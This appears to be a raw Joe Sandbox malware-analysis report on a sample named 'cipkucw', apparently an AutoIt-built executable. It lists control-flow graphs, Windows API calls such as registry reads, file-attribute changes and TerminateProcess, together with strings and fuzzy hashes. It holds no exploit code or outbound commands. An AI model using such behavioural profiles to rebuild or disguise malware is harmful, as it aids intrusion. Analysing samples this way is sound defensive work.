                                        control_flow_graph 2094 6f2a52-6f2a8b 2095 7339f4-7339f5 DestroyWindow 2094->2095 2096 6f2a91-6f2aa7 mciSendStringW 2094->2096 2101 733a00-733a0d 2095->2101 2097 6f2aad-6f2ab5 2096->2097 2098 6f2d08-6f2d15 2096->2098 2097->2101 2102 6f2abb-6f2aca call 6f2e70 2097->2102 2099 6f2d3a-6f2d41 2098->2099 2100 6f2d17-6f2d32 UnregisterHotKey 2098->2100 2099->2097 2105 6f2d47 2099->2105 2100->2099 2104 6f2d34-6f2d35 call 6f2712 2100->2104 2106 733a0f-733a12 2101->2106 2107 733a3c-733a43 2101->2107 2113 733a4a-733a56 2102->2113 2114 6f2ad0-6f2ad8 2102->2114 2104->2099 2105->2098 2111 733a14-733a1c call 6f7953 2106->2111 2112 733a1e-733a21 FindClose 2106->2112 2107->2101 2110 733a45 2107->2110 2110->2113 2115 733a27-733a34 2111->2115 2112->2115 2121 733a60-733a67 2113->2121 2122 733a58-733a5a FreeLibrary 2113->2122 2118 6f2ade-6f2b03 call 6fe650 2114->2118 2119 733a6e-733a7b 2114->2119 2115->2107 2120 733a36-733a37 call 763c0b 2115->2120 2132 6f2b3a-6f2b45 CoUninitialize 2118->2132 2133 6f2b05 2118->2133 2126 733aa2-733aa9 2119->2126 2127 733a7d-733a9a VirtualFree 2119->2127 2120->2107 2121->2113 2125 733a69 2121->2125 2122->2121 2125->2119 2126->2119 2128 733aab 2126->2128 2127->2126 2130 733a9c-733a9d call 763c71 2127->2130 2134 733ab0-733ab4 2128->2134 2130->2126 2132->2134 2136 6f2b4b-6f2b50 2132->2136 2135 6f2b08-6f2b38 call 6f3047 call 6f2ff0 2133->2135 2134->2136 2137 733aba-733ac0 2134->2137 2135->2132 2139 733ac5-733ad2 call 763c45 2136->2139 2140 6f2b56-6f2b60 2136->2140 2137->2136 2153 733ad4 2139->2153 2143 6f2d49-6f2d56 call 70fb27 2140->2143 2144 6f2b66-6f2b71 call 6fbd2c 2140->2144 2143->2144 2155 6f2d5c 2143->2155 2154 6f2b77 call 6f2f86 2144->2154 2157 733ad9-733afb call 71015d 2153->2157 2156 6f2b7c-6f2be7 call 6f2e17 call 7101a4 call 6f2dbe call 6fbd2c call 6fe650 call 6f2e40 call 7101a4 2154->2156 2155->2143 2156->2157 2183 6f2bed-6f2c11 call 7101a4 2156->2183 2162 733afd 2157->2162 2165 733b02-733b24 call 71015d 2162->2165 2171 733b26 2165->2171 2174 733b2b-733b4d call 71015d 2171->2174 2181 733b4f 2174->2181 2184 733b54-733b61 call 756d63 2181->2184 2183->2165 2189 6f2c17-6f2c3b call 7101a4 2183->2189 2190 733b63 2184->2190 2189->2174 2195 6f2c41-6f2c5b call 7101a4 2189->2195 2192 733b68-733b75 call 70bd6a 2190->2192 2198 733b77 2192->2198 2195->2184 2200 6f2c61-6f2c85 call 6f2e17 call 7101a4 2195->2200 2201 733b7c-733b89 call 763b9f 2198->2201 2200->2192 2209 6f2c8b-6f2c93 2200->2209 2207 733b8b 2201->2207 2211 733b90-733b9d call 763c26 2207->2211 2209->2201 2210 6f2c99-6f2caa call 6fbd2c call 6f2f4c 2209->2210 2218 6f2caf-6f2cb7 2210->2218 2217 733b9f 2211->2217 2219 733ba4-733bb1 call 763c26 2217->2219 2218->2211 2220 6f2cbd-6f2ccb 2218->2220 2225 733bb3 2219->2225 2220->2219 2222 6f2cd1-6f2d07 call 6fbd2c * 3 call 6f2eb8 2220->2222 2225->2225
                                        APIs
                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006F2A9B
                                        • CoUninitialize.COMBASE ref: 006F2B3A
                                        • UnregisterHotKey.USER32(?), ref: 006F2D1F
                                        • DestroyWindow.USER32(?), ref: 007339F5
                                        • FreeLibrary.KERNEL32(?), ref: 00733A5A
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00733A87
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                        • String ID: close all
                                        • API String ID: 469580280-3243417748
                                        • Opcode ID: a2c7ef07c14df86097d4edbc5c7ad86dbc8c1aea686c92ba1c509ddbfdb747f4
                                        • Instruction ID: 12271c3962241f8806488fec7eda6aede7666627f61eb54317e74f4ab0a21aa9
                                        • Opcode Fuzzy Hash: a2c7ef07c14df86097d4edbc5c7ad86dbc8c1aea686c92ba1c509ddbfdb747f4
                                        • Instruction Fuzzy Hash: 8BD17E71701216CFDB29EF14C499A79F7A2BF04700F1481ADE94AAB292DB34AD52CF85
                                        Function 0076874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2233 76874a-76878c call 7322f0 call 6f8e70 2238 7687a2 2233->2238 2239 76878e-76879c call 6fc92d 2233->2239 2241 7687a4-7687b0 2238->2241 2239->2238 2245 76879e-7687a0 2239->2245 2243 7687b6 2241->2243 2244 76886d-76891f call 6f8e70 call 6f557e call 71d913 call 7193c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 2241->2244 2246 7687ba-7687c0 2243->2246 2278 768973-768984 call 6fe650 2244->2278 2279 768921-76892d call 75e387 2244->2279 2245->2241 2248 7687c2-7687c8 2246->2248 2249 7687ca-7687cf 2246->2249 2251 7687d6 2248->2251 2253 7687d1-7687d4 2249->2253 2254 7687d9-7687df 2249->2254 2251->2254 2253->2251 2256 7687e1-7687e4 2254->2256 2257 768848-76884a 2254->2257 2256->2257 2260 7687e6-7687e9 2256->2260 2258 76884b-76884e 2257->2258 2263 768850-768856 2258->2263 2264 768858 2258->2264 2261 768844-768846 2260->2261 2262 7687eb-7687ee 2260->2262 2267 76883d-76883e 2261->2267 2262->2261 2266 7687f0-7687f3 2262->2266 2268 76885c-768867 2263->2268 2264->2268 2270 7687f5-7687f8 2266->2270 2271 768840-768842 2266->2271 2267->2258 2268->2244 2268->2246 2270->2271 2274 7687fa-7687fd 2270->2274 2271->2267 2276 7687ff-768802 2274->2276 2277 76883b 2274->2277 2276->2277 2280 768804-768807 2276->2280 2277->2267 2291 768987-76898b call 6fbd2c 2278->2291 2279->2278 2288 76892f-76893a call 75e9c5 2279->2288 2282 768834-768839 2280->2282 2283 768809-76880c 2280->2283 2282->2258 2283->2282 2286 76880e-768811 2283->2286 2289 768813-768816 2286->2289 2290 76882d-768832 2286->2290 2299 768940-768967 GetFileAttributesW SetFileAttributesW 2288->2299 2300 7689cf 2288->2300 2289->2290 2293 768818-76881b 2289->2293 2290->2258 2298 768990-768998 2291->2298 2296 768826-76882b 2293->2296 2297 76881d-768820 2293->2297 2296->2258 2297->2296 2301 76899b-7689af call 6fe650 2297->2301 2304 7689b1-7689b3 2299->2304 2305 768969-768971 SetCurrentDirectoryW 2299->2305 2303 7689d3-7689e5 call 769f9f 2300->2303 2301->2298 2311 7689ea-7689ec 2303->2311 2307 7689b5-7689cd SetCurrentDirectoryW call 714d13 2304->2307 2308 768a02-768a0c SetCurrentDirectoryW 2304->2308 2305->2278 2307->2303 2308->2291 2311->2308 2313 7689ee-7689fb call 6fe650 2311->2313 2313->2308
                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00768907
                                        • SetCurrentDirectoryW.KERNELBASE(?), ref: 0076891B
                                        • GetFileAttributesW.KERNEL32(?), ref: 00768945
                                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0076895F
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00768971
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 007689BA
                                        • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00768A0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$AttributesFile
                                        • String ID: *.*
                                        • API String ID: 769691225-438819550
                                        • Opcode ID: 29ffa1ee68083cbd056da9380d0c12defe14211e05040988eeebb130a891d436
                                        • Instruction ID: f5980677f5213d8d03c2593ea6b3147663621b52d9f82429db5fc993b9c524c5
                                        • Opcode Fuzzy Hash: 29ffa1ee68083cbd056da9380d0c12defe14211e05040988eeebb130a891d436
                                        • Instruction Fuzzy Hash: 7E81BF725143059FCBA0EF64C444AAAB3E9BF84310F584A1EF986D7251DB38E944CB93
                                        Function 007290D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3d1482f6894bb774a3f9b333d8451071375bd3e559dbe5f09e3c64d015eceb31
                                        • Instruction ID: 53cfa46cf2d8e138f1c5b05d91d84ffb9daa142f8f210b375c022c6666d01f58
                                        • Opcode Fuzzy Hash: 3d1482f6894bb774a3f9b333d8451071375bd3e559dbe5f09e3c64d015eceb31
                                        • Instruction Fuzzy Hash: 92C1C6B0E04259EFDB11DFA8E845BAD7BB4AF09310F184159E614A73D3C7389D42CB65
                                        Function 006F353A Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006F3568
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 006F3589
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F359D
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,006F32EF,?), ref: 006F35A6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                        • Instruction ID: 1d4d239e787e7ca3ee6ed5d54bf81fa1159ead4f0fa3da4fd5b933af6f4e5f59
                                        • Opcode Fuzzy Hash: c13ea39f5abb8b53604e812d9d2f9f195960e6a0495b8869d6d7907b50cc31c4
                                        • Instruction Fuzzy Hash: 11F0DA716403D47AE73157176C48E372FBDE7C6F50B10802EB904A71A1D66D1C52DBB8
                                        Function 0074E71E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32 ref: 0074E72B
                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0074E73D
                                        • FreeLibrary.KERNEL32(00000000), ref: 0074E763
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: GetSystemWow64DirectoryW$X64
                                        • API String ID: 145871493-2590602151
                                        • Opcode ID: 0d5c203efc5afe0a320706b07ed0a70caf85d752d927b75dd7af8da933eb595a
                                        • Instruction ID: d794ab7b50b646ec9f1fe3752279ce18585e17ec53e2d764de425087160193c2
                                        • Opcode Fuzzy Hash: 0d5c203efc5afe0a320706b07ed0a70caf85d752d927b75dd7af8da933eb595a
                                        • Instruction Fuzzy Hash: 32E0ED71C42624EBDB732B208C4CEAD6729BF10B60F264969F801E2091DB3CDC44878A
                                        Function 006F55F8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F561C
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F563D
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,006F55EB,SwapMouseButtons,00000004,?), ref: 006F565F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                        • Instruction ID: 1cf3c63479d7d2064cdd5d7b0876ab1780427a9fa8791aac8aecb42c24068d51
                                        • Opcode Fuzzy Hash: c401431bdf85aa224c2400611052732cd325672188e0f9f2d05fbe936248d7e9
                                        • Instruction Fuzzy Hash: FC115A71610608BFDB208F64DC40DFE77B9EF00744F508469AA16D7220E6719E419764
                                        Function 0075DA81 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,0078DC30), ref: 0075DABB
                                        • GetLastError.KERNEL32 ref: 0075DACA
                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0075DAD9
                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0078DC30), ref: 0075DB36
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 2267087916-0
                                        • Opcode ID: 17da639fcff2e87758d8b2d4e33943b447c42a7fec62d14f150e865280820451
                                        • Instruction ID: 956e8563ce232050bea256b8dc198f62ab744f85b8f8ac41ba14da768fe906b3
                                        • Opcode Fuzzy Hash: 17da639fcff2e87758d8b2d4e33943b447c42a7fec62d14f150e865280820451
                                        • Instruction Fuzzy Hash: 0F21BF705482059F8730DF24C8818ABB7E5EF59365F204A1DF8A9C32E1E774DD0ACB56
                                        Function 006F3A1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00734115
                                          • Part of subcall function 006F557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006F5558,?,?,00734B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 006F559E
                                          • Part of subcall function 006F39DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006F39FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X$`u{
                                        • API String ID: 779396738-1012507993
                                        • Opcode ID: 47efea71297c16791b31e9a05ee2c21492b95e325dc359decd21b3c3c829b41f
                                        • Instruction ID: 201aa45603083f3cd8eb2c35a8b25329f2eb7f86cbb5cc2734eded86d7d75213
                                        • Opcode Fuzzy Hash: 47efea71297c16791b31e9a05ee2c21492b95e325dc359decd21b3c3c829b41f
                                        • Instruction Fuzzy Hash: D321C671A0429C9BDB55DF98C805BEE7BF9AF49300F004059E505A7381DBF89A89CBA5
                                        Function 0071016B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 007109F8
                                          • Part of subcall function 00713634: RaiseException.KERNEL32(?,?,?,00710A1A,?,00000000,?,?,?,?,?,?,00710A1A,00000000,007B9758,00000000), ref: 00713694
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00710A15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 912fbc25f4e06bcfb80edbb8e3ed709b97a5c5bd67a6bbc0d6736db4da58b895
                                        • Instruction ID: 0733c631e5b575de3d20eb974c439d39cf7ff98bb21d1c8e00d5335bc011327e
                                        • Opcode Fuzzy Hash: 912fbc25f4e06bcfb80edbb8e3ed709b97a5c5bd67a6bbc0d6736db4da58b895
                                        • Instruction Fuzzy Hash: E7F0627590020DF78B04BABCEC5A9DD7B6C5E00750BA04161B924A65E2EBBCEED6C5C0
                                        Function 0074E59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: c4db589c2cc5117eda98b8f629fcdb349ecea7c3e45b8d29054c155a74f530c5
                                        • Instruction ID: c058a086c8edb82d915c0bda8689902c65bec6e5dff5f37c6e9478f9ed34e676
                                        • Opcode Fuzzy Hash: c4db589c2cc5117eda98b8f629fcdb349ecea7c3e45b8d29054c155a74f530c5
                                        • Instruction Fuzzy Hash: FFD062B1C04159D5CBE09A90DD499BDB3BCB718710F648852F906D1041E73C95599722
                                        Function 007788B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00778C52
                                        • TerminateProcess.KERNEL32(00000000), ref: 00778C59
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 00778E3A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: 7e9a07a381949f1d9be2ad79ef277b90832e841d08bbb0b6399a1455f65dd37c
                                        • Instruction ID: 0bacaa69b1707b7fb70233659243c6c422df7a9bfada78edc5258b33164cfcdd
                                        • Opcode Fuzzy Hash: 7e9a07a381949f1d9be2ad79ef277b90832e841d08bbb0b6399a1455f65dd37c
                                        • Instruction Fuzzy Hash: 84125D71A04340DFCB54CF28C488B2ABBE5FF88354F14895DE9898B292CB75ED45CB92
                                        Function 006F6BFA Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 006F6CA1
                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 006F6CB1
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: a4259b8682736a13bef2bbee383b609779c9b83c20940c6ca4c2c3811290ce3d
                                        • Instruction ID: c3e798e4342fc30196c33bdb8386c0c0d6ded979bddb18b49cac9d63ef8aa29d
                                        • Opcode Fuzzy Hash: a4259b8682736a13bef2bbee383b609779c9b83c20940c6ca4c2c3811290ce3d
                                        • Instruction Fuzzy Hash: F5314C71A00609EFDB14CF68C980BA9B7B6FB04314F148629FA9597340D7B1FE94DB90
                                        Function 0070FCBB Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 006F5F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 006F6049
                                        • KillTimer.USER32(?,00000001,?,?), ref: 0070FD44
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0070FD53
                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0074FDD3
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_Timer$Kill
                                        • String ID:
                                        • API String ID: 3500052701-0
                                        • Opcode ID: a387e9f9ad645aed1fb1c989724f88c606eedb68d7487a331849b7d181db6184
                                        • Instruction ID: 44697bc707cfadeebe2ae0b3a0d495d21aa502e810ae95a7f089221c33620eab
